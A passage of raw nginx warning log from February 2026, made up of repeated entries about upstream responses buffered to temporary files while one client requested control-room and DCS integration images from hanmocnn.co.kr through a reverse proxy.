"http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:24:17 [warn] 882#882: *39491 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/89/0000010892 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:24:17 [warn] 882#882: *39491 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/89/0000010893 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:37:34 [warn] 883#883: *39538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/89/0000010894 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:37:34 [warn] 883#883: *39538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/89/0000010895 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:37:35 [warn] 883#883: *39538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/89/0000010896 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:41:44 [warn] 883#883: *39556 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/89/0000010897 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:41:44 [warn] 883#883: *39556 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/89/0000010898 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:41:44 [warn] 883#883: *39556 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/89/0000010899 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:41:44 [warn] 883#883: *39556 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/90/0000010900 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:42:25 [warn] 883#883: *39556 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/90/0000010901 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:42:25 [warn] 883#883: *39556 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/90/0000010902 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:44:45 [warn] 883#883: *39581 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/90/0000010903 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:44:45 [warn] 883#883: *39581 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/90/0000010904 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:44:45 [warn] 883#883: *39581 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/90/0000010905 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:44:45 [warn] 883#883: *39581 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/90/0000010906 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:53:42 [warn] 883#883: *39595 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/90/0000010907 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:53:42 [warn] 883#883: *39595 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/90/0000010908 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:54:01 [warn] 883#883: *39595 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/90/0000010909 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 21:00:42 [warn] 883#883: *39618 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/91/0000010910 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 21:05:01 [warn] 886#886: *39631 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/91/0000010911 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 21:05:01 [warn] 886#886: *39631 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/91/0000010912 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 21:47:16 [warn] 886#886: *39665 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/91/0000010913 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 21:47:16 [warn] 886#886: *39665 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/91/0000010914 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 21:47:16 [warn] 886#886: *39665 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/91/0000010915 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 21:47:16 [warn] 886#886: *39665 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/91/0000010916 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 21:47:16 [warn] 886#886: *39665 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/91/0000010917 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 21:49:42 [warn] 886#886: *39677 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/91/0000010918 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 21:49:42 [warn] 886#886: *39677 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/91/0000010919 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 21:49:43 [warn] 886#886: *39677 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/92/0000010920 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 21:56:10 [warn] 886#886: *39690 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/92/0000010921 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 21:56:10 [warn] 886#886: *39690 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/92/0000010922 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 21:56:10 [warn] 886#886: *39690 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/92/0000010923 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 21:56:11 [warn] 886#886: *39690 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/92/0000010924 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 21:56:43 [warn] 886#886: *39703 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/92/0000010925 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 21:56:43 [warn] 886#886: *39703 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/92/0000010926 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 21:57:35 [warn] 886#886: *39717 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/92/0000010927 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 21:59:07 [warn] 886#886: *39730 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/92/0000010928 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 21:59:07 [warn] 886#886: *39730 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/92/0000010929 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 21:59:08 [warn] 886#886: *39730 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/93/0000010930 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 22:06:50 [warn] 887#887: *39757 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/93/0000010931 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 22:10:30 [warn] 887#887: *39769 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/93/0000010932 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 22:10:30 [warn] 887#887: *39769 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/93/0000010933 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 22:52:26 [warn] 887#887: *39800 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/93/0000010934 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 22:52:26 [warn] 887#887: *39800 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/93/0000010935 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 22:58:56 [warn] 885#885: *39812 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/93/0000010936 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 22:58:56 [warn] 885#885: *39812 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/93/0000010937 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 22:59:53 [warn] 885#885: *39812 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/93/0000010938 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 23:00:51 [warn] 885#885: *39812 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/93/0000010939 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 23:03:40 [warn] 885#885: *39846 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/94/0000010940 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 23:03:40 [warn] 885#885: *39846 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/94/0000010941 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 23:25:14 [warn] 885#885: *39864 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/94/0000010942 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 23:25:14 [warn] 885#885: *39864 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/94/0000010943 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 23:29:17 [warn] 885#885: *39878 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/94/0000010944 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 23:31:15 [warn] 885#885: *39891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/94/0000010945 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 23:33:56 [warn] 885#885: *39904 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/94/0000010946 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 23:33:56 [warn] 885#885: *39904 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/94/0000010947 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 23:41:16 [warn] 885#885: *39917 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/94/0000010948 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 23:41:16 [warn] 885#885: *39917 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/94/0000010949 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 23:41:16 [warn] 885#885: *39917 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/95/0000010950 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 23:41:17 [warn] 885#885: *39917 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/95/0000010951 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 23:47:14 [warn] 888#888: *39941 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/95/0000010952 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 23:47:14 [warn] 888#888: *39941 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/95/0000010953 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 23:47:14 [warn] 888#888: *39941 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/95/0000010954 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 23:49:18 [warn] 888#888: *39953 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/95/0000010955 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 23:56:08 [warn] 888#888: *39965 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/95/0000010956 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 23:56:08 [warn] 888#888: *39965 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/95/0000010957 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 23:56:54 [warn] 888#888: *39965 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/95/0000010958 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 00:03:29 [warn] 895#895: *39990 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/95/0000010959 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 00:03:29 [warn] 895#895: *39990 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/96/0000010960 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 00:03:29 [warn] 895#895: *39990 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/96/0000010961 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 00:03:29 [warn] 895#895: *39990 an upstream response is buffered to a temporary file 